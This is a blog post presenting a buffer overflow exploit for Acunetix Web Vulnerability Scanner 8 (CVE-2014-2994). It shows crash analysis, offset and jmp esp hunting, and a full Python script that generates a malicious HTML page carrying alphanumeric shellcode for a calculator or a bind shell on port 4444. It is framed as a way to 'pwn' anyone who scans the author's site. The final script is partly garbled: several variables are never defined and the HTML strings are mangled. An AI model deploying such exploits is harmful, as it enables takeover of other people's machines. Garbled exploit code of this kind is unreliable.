Pwning Script Kiddies – Acunetix Buffer Overflow

Introduction

Recently a security researcher named “Danor Cohen – An7i” had found a buffer overflow vulnerability and he has written a nice exploit for Acunetix Web Vulnerability Scanner 8.0. As this exploit was an ascii based one I was interested in re-writing the exploit because my previous exploit was also an ascii based one. However with the emerging of bug bounties and responsible disclosure policies I’ve seen many people firing up web application security scanners against live hosts in which automated vulnerability assessments are not permitted at all. Well, by triggering this buffer overflow vulnerability we can have some fun owning the noobs 😉

Crash

When we submit a new website to be scanned by Acunetix it searches for html tags like <img src=”” >, <a href=””> to get the additional hosts from that website. So if we place an html tag in the page like

[code language=”html”]
<a href="http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">
[/code]

 

I first gave 1000 A chars to crash the app. I’ve created an html file with the above payload. Click “New Scan” and give the target and keep on clicking next until you get this dialog box.

View post on imgur.com

Acunetix detects the http://AAAAAA as an external website under the Additional Hosts. Mark a tick on it and proceed forward 😉 The app will terminate. Let’s have a closer look with the debugger.

View post on imgur.com

We can clearly see that the app takes only ascii printable chars as we are dealing with a URL string. We cannot inject ascii special chars wither like ‘ “ / # they get url encoded. So our character set would be something like 1-0 a-z A-Z and chars like ={}!()[]. Also we can see that the EDX register is overwritten with A chars.

View post on imgur.com

We can see that the EIP is pointing to this memory location which says

[code language=”python”]
00405998 8B4A F8 MOV ECX,DWORD PTR DS:[EDX-8]
[/code]

The address in EDX-8 will be moved to the ECX register.

View post on imgur.com

We need to anyhow fix the flow of the application. According to An7i he had found this address 0x66303035 = f005 which is ascii printable chars without any url encodes or bad chars 🙂

Building the Exploit

It’s time to start developing the exploit. I will be using python for the exploit. You can use whatever you like, the language doesn’t really matter. First let’s create a pattern and get the exact offset of the EDX register.

View post on imgur.com

The EDX contains this value 6A413969. Let’s check the offset.

View post on imgur.com

After 268 bytes we can write our address which will make the app flow in the EDX register. Yes! We were able to overwrite the EIP register. It is after 4 bytes. Next we can place our shellcode in the ESP register and pwn the system. But our jmp esp address should be in printable ascii chars.

View post on imgur.com

Let’s find a printable ascii jmp esp address by using mona.

[code language=”python”]
!mona jmp -r esp -cp asciiprint
0x4d526349 : jmp esp | asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [WINHTTP.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.2180 (C:\WINDOWS\system32\WINHTTP.dll)
[/code]

I will be using the address from “WINHTTP.dll” That address is equal to “MRcI” which is perfect for our exploit. For the payload we have to encode using the x86/alpha_mixed encoder. You can manually encode your payload like this

[code language=”python”]
ALPHA3.py esp –input="shellcode.bin"
[/code]

Or directly pipe msfencode to msfpayload and get our job done.

[code language=”python”]
msfpayload windows/exec cmd=calc EXITFUNC=thread R| msfencode -e x86/alpha_mixed -t python BufferRegister=ESP
[/code]

Final Exploit

[code language=”python”]
#!/usr/bin/python
# Title: Acunetix Web Vulnerability Scanner Buffer Overflow Exploit
# Version: 8
# Build: 20120704
# Tested on: Windows XP SP2 en
# Vendor: http://www.acunetix.com/
# Original Advisory: http://an7isec.blogspot.co.il/2014/04/pown-noobs-acunetix-0day.html
# Exploit-Author: Osanda Malith
# Follow @OsandaMalith
# /!\ Author is not responsible for any damage you cause
# This POC is for educational purposes only
# Video: https://www.youtube.com/watch?v=RHaMx8K1GeM
# CVE: CVE-2014-2994
”’
Host the generated file in a server. The victim should select the external host. Otherwise we cannot trigger
the vulnerability.
”’
print (‘[~] Acunetix Web Vulnerability Scanner Buffer Overflow Exploit\n’)
while True:
try:
choice = int(raw_input("[?] Choose your payload:\n1. Calculator\n2. Bind Shell\n"))
except ValueError:
print "[!] Enter only a number"
continue

if choice == 1:
shellcode = ""
shellcode += "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
shellcode += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
shellcode += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
shellcode += "\x49\x6c\x6d\x38\x6e\x69\x75\x50\x73\x30\x77\x70\x63"
shellcode += "\x50\x6f\x79\x68\x65\x30\x31\x49\x42\x63\x54\x4c\x4b"
shellcode += "\x31\x42\x46\x50\x4c\x4b\x46\x32\x44\x4c\x6e\x6b\x70"
shellcode += "\x52\x46\x74\x4c\x4b\x64\x32\x34\x68\x64\x4f\x4e\x57"
shellcode += "\x30\x4a\x35\x76\x66\x51\x69\x6f\x64\x71\x69\x50\x6e"
shellcode += "\x4c\x65\x6c\x71\x71\x61\x6c\x77\x72\x74\x6c\x31\x30"
shellcode += "\x69\x51\x4a\x6f\x54\x4d\x53\x31\x69\x57\x39\x72\x58"
shellcode += "\x70\x71\x42\x53\x67\x6e\x6b\x63\x62\x74\x50\x6e\x6b"
shellcode += "\x53\x72\x57\x4c\x77\x71\x48\x50\x6c\x4b\x37\x30\x31"
shellcode += "\x68\x4e\x65\x4b\x70\x43\x44\x31\x5a\x36\x61\x58\x50"
shellcode += "\x62\x70\x6c\x4b\x31\x58\x34\x58\x6e\x6b\x42\x78\x77"
shellcode += "\x50\x36\x61\x38\x53\x6b\x53\x67\x4c\x57\x39\x4e\x6b"
shellcode += "\x77\x44\x4e\x6b\x47\x71\x69\x46\x34\x71\x49\x6f\x64"
shellcode += "\x71\x39\x50\x6c\x6c\x6f\x31\x7a\x6f\x46\x6d\x47\x71"
shellcode += "\x69\x57\x35\x68\x59\x70\x71\x65\x49\x64\x57\x73\x33"
shellcode += "\x4d\x6a\x58\x35\x6b\x43\x4d\x67\x54\x31\x65\x6d\x32"
shellcode += "\x61\x48\x6c\x4b\x51\x48\x34\x64\x66\x61\x6e\x33\x35"
shellcode += "\x36\x6c\x4b\x66\x6c\x30\x4b\x4e\x6b\x43\x68\x45\x4c"
shellcode += "\x33\x31\x4a\x73\x4c\x4b\x53\x34\x4e\x6b\x53\x31\x4e"
shellcode += "\x30\x4c\x49\x37\x34\x54\x64\x54\x64\x73\x6b\x31\x4b"
shellcode += "\x31\x71\x52\x79\x42\x7a\x53\x61\x79\x6f\x69\x70\x42"
shellcode += "\x78\x63\x6f\x43\x6a\x6c\x4b\x77\x62\x7a\x4b\x6c\x46"
shellcode += "\x53\x6d\x70\x6a\x57\x71\x4c\x4d\x4e\x65\x6e\x59\x53"
shellcode += "\x30\x45\x50\x47\x70\x52\x70\x52\x48\x44\x71\x6e\x6b"
shellcode += "\x42\x4f\x4b\x37\x6b\x4f\x78\x55\x4d\x6b\x6b\x50\x45"
shellcode += "\x4d\x56\x4a\x47\x7a\x50\x68\x4f\x56\x4e\x75\x6f\x4d"
shellcode += "\x4f\x6d\x59\x6f\x68\x55\x77\x4c\x46\x66\x51\x6c\x65"
shellcode += "\x5a\x6d\x50\x6b\x4b\x4b\x50\x44\x35\x56\x65\x6f\x4b"
shellcode += "\x71\x57\x64\x53\x54\x32\x42\x4f\x53\x5a\x33\x30\x61"
shellcode += "\x43\x49\x6f\x68\x55\x33\x53\x33\x51\x52\x4c\x43\x53"
shellcode += "\x65\x50\x41\x41"
break

elif choice == 2:
# Modify this part with your own custom shellcode
# msfpayload windows/shell/bind_tcp EXITFUNC=thread LPORT=4444 R| msfencode -e x86/alpha_mixed -t python shellcodeferRegister=ESP
shellcode = ""
shellcode += "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
shellcode += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
shellcode += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
shellcode += "\x69\x6c\x4b\x58\x6c\x49\x65\x50\x73\x30\x73\x30\x31"
shellcode += "\x70\x6e\x69\x48\x65\x70\x31\x59\x42\x55\x34\x4c\x4b"
shellcode += "\x42\x72\x76\x50\x6c\x4b\x73\x62\x76\x6c\x4c\x4b\x53"
shellcode += "\x62\x57\x64\x6e\x6b\x63\x42\x34\x68\x66\x6f\x48\x37"
shellcode += "\x30\x4a\x54\x66\x55\x61\x79\x6f\x55\x61\x4b\x70\x4c"
shellcode += "\x6c\x35\x6c\x30\x61\x33\x4c\x75\x52\x64\x6c\x67\x50"
shellcode += "\x6f\x31\x5a\x6f\x54\x4d\x47\x71\x48\x47\x6b\x52\x38"
shellcode += "\x70\x61\x42\x46\x37\x6e\x6b\x32\x72\x66\x70\x6e\x6b"
shellcode += "\x73\x72\x75\x6c\x73\x31\x4e\x30\x6e\x6b\x71\x50\x43"
shellcode += "\x48\x4b\x35\x49\x50\x61\x64\x72\x6a\x33\x31\x78\x50"
shellcode += "\x76\x30\x4c\x4b\x77\x38\x35\x48\x6e\x6b\x53\x68\x61"
shellcode += "\x30\x65\x51\x5a\x73\x69\x73\x77\x4c\x50\x49\x4e\x6b"
shellcode += "\x56\x54\x6e\x6b\x45\x51\x69\x46\x75\x61\x6b\x4f\x66"
shellcode += "\x51\x49\x50\x6c\x6c\x4b\x71\x78\x4f\x56\x6d\x35\x51"
shellcode += "\x4a\x67\x50\x38\x59\x70\x61\x65\x39\x64\x67\x73\x31"
shellcode += "\x6d\x6a\x58\x45\x6b\x43\x4d\x76\x44\x50\x75\x49\x72"
shellcode += "\x52\x78\x6e\x6b\x61\x48\x46\x44\x43\x31\x68\x53\x45"
shellcode += "\x36\x4e\x6b\x34\x4c\x42\x6b\x6e\x6b\x73\x68\x35\x4c"
shellcode += "\x57\x71\x6b\x63\x4c\x4b\x53\x34\x6c\x4b\x43\x31\x4e"
shellcode += "\x30\x4e\x69\x32\x64\x47\x54\x56\x44\x73\x6b\x61\x4b"
shellcode += "\x75\x31\x31\x49\x72\x7a\x76\x31\x59\x6f\x59\x70\x61"
shellcode += "\x48\x51\x4f\x31\x4a\x6c\x4b\x52\x32\x78\x6b\x6e\x66"
shellcode += "\x43\x6d\x42\x48\x67\x43\x45\x62\x37\x70\x63\x30\x72"
shellcode += "\x48\x42\x57\x32\x53\x76\x52\x31\x4f\x42\x74\x50\x68"
shellcode += "\x52\x6c\x64\x37\x64\x66\x44\x47\x39\x6f\x69\x45\x4d"
shellcode += "\x68\x5a\x30\x65\x51\x57\x70\x63\x30\x76\x49\x59\x54"
shellcode += "\x31\x44\x52\x70\x45\x38\x64\x69\x4f\x70\x50\x6b\x57"
shellcode += "\x70\x59\x6f\x7a\x75\x52\x70\x52\x70\x32\x70\x52\x70"
shellcode += "\x47\x30\x30\x50\x67\x30\x66\x30\x63\x58\x48\x6a\x54"
shellcode += "\x4f\x49\x4f\x69\x70\x79\x6f\x4e\x35\x4c\x57\x45\x61"
shellcode += "\x6b\x6b\x51\x43\x73\x58\x73\x32\x57\x70\x34\x51\x73"
shellcode += "\x6c\x6f\x79\x4a\x46\x42\x4a\x76\x70\x46\x36\x50\x57"
shellcode += "\x71\x78\x7a\x62\x4b\x6b\x70\x37\x72\x47\x6b\x4f\x48"
shellcode += "\x55\x62\x73\x51\x47\x72\x48\x4c\x77\x78\x69\x47\x48"
shellcode += "\x4b\x4f\x69\x6f\x48\x55\x30\x53\x52\x73\x53\x67\x45"
shellcode += "\x38\x62\x54\x5a\x4c\x67\x4b\x6d\x31\x69\x6f\x5a\x75"
shellcode += "\x72\x77\x6c\x57\x62\x48\x54\x35\x50\x6e\x32\x6d\x35"
shellcode += "\x31\x4b\x4f\x69\x45\x61\x7a\x77\x70\x32\x4a\x73\x34"
shellcode += "\x62\x76\x61\x47\x70\x68\x63\x32\x78\x59\x4a\x68\x31"
shellcode += "\x4f\x49\x6f\x48\x55\x6e\x6b\x46\x56\x51\x7a\x71\x50"
shellcode += "\x62\x48\x65\x50\x46\x70\x63\x30\x43\x30\x31\x46\x32"
shellcode += "\x4a\x55\x50\x71\x78\x31\x48\x49\x34\x66\x33\x6b\x55"
shellcode += "\x59\x6f\x4e\x35\x4f\x63\x72\x73\x71\x7a\x37\x70\x30"
shellcode += "\x56\x70\x53\x71\x47\x45\x38\x74\x42\x38\x59\x6f\x38"
shellcode += "\x33\x6f\x49\x6f\x69\x45\x67\x71\x79\x53\x76\x49\x6b"
shellcode += "\x76\x6f\x75\x48\x76\x62\x55\x58\x6c\x49\x53\x41\x41"

print "[+] Connect on port 4444"
break
else:
print "[-] Invalid Choice"
continue

head = ("\\</pre>
<center>
<h1>Scan This Site and Get Pwned :)</h1>
</center>
<pre>
")
junk = ("\
<a href="\&quot;http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\">"
tail = ("<img src="\&quot;http://i.imgur.com/BimAoR0.jpg\&quot;" alt="" />\
</a>\
")
exploit = head + junk + edx + junk2 + eip + shellcode + tail
filename = "Exploit.htm"
file = open(filename, "w")
file.write(exploit)
file.close()
print "[~] " + str(len(exploit)) + " Bytes written to file"
#EOF
[/code]

http://pastie.org/9107965

The latest version 9 is not vulnerable. Don’t get pwned kiddies 😉

View post on imgur.com

CVE-2014-2994
http://packetstormsecurity.com/files/126307/Acunetix-8-Scanner-Buffer-Overflow.html

SANS InfoSec Handlers Diary Blog:
https://isc.sans.edu/diary/Using+Security+Tools+to+Compromize+a+Network/21903